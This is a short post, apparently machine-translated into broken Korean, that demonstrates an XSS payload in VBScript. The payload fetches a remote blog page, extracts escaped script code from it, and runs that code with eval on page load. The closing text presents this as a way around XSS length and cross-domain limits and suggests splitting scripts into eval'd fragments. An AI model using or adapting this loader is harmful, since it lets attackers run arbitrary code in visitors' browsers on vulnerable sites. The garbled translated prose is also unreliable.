재 미 있 는 Ajax Hack 시범
2162 단어 재 미 있 는 Ajax해 킹 시범
vbscript:execute("
dim l,s:
l=chr(13)+chr(10):
s=""sub mycode""&l:
s=s&""dim http,url,pg,p,p2,cd,ht,o""&l:
s=s&""url=""""http://hi.baidu.com/monyer/blog/item/83b70ed71b5095dda044df67.html""""""&l:
s=s&""set http=createobject(""""Microsoft.XMLHTTP"""")""&l:
s=s&""http.open """"get"""",url,false""&l:
s=s&""http.send("""""""")""&l:
s=s&""pg=http.responseText""&l:
s=s&""p=instr(1,pg,""""ILOVEUNING-BEGIN"""")""&l:
s=s&""if p=null or p<1 then exit sub""&l:
s=s&""p=instr(p,pg,chr(37))""&l:
s=s&""if p=null or p<1 then exit sub""&l:
s=s&""p2=instr(p,pg,chr(60))""&l:
s=s&""cd=mid(pg,p,p2-p)""&l:
s=s&""ht=""""eval(unescape('""""&cd&""""'))""""""&l:
s=s&""window.execScript ht,""""jscript""""""&l:
s=s&""end sub""&l:
execute(s):
document.body.onload=getref(""mycode""):
")
호출 코드 는 http://hi.baidu.com/monyer/blog/item/83b70ed71b5095dda044df67.html 이렇게 해서 본 사이트 의 호출 코드 를 실현 하고 생각 을 바 꾸 었 습 니 다.이것 이 Ajax 를 해결 하 는 것 입 니까? Hack 이 자주 사용 하 는 제출 데이터 제한(역 외 제출 권한 없 음,XSS 코드 길이 제한)문제 입 니 다.ㅎ ㅎ~여기 도 실험 이 없습니다.또 하나의 아 이 디 어 는 검 심의 조각 을 나 누 어 스 크 립 트 를 쓰 고 eval 나 오 는 것 입 니 다.이 두 가지 아 이 디 어 를 결합 하면 우 리 는 가혹 한 XSS 구멍 에서 기적 을 창조 할 수 있 을 것 입 니 다!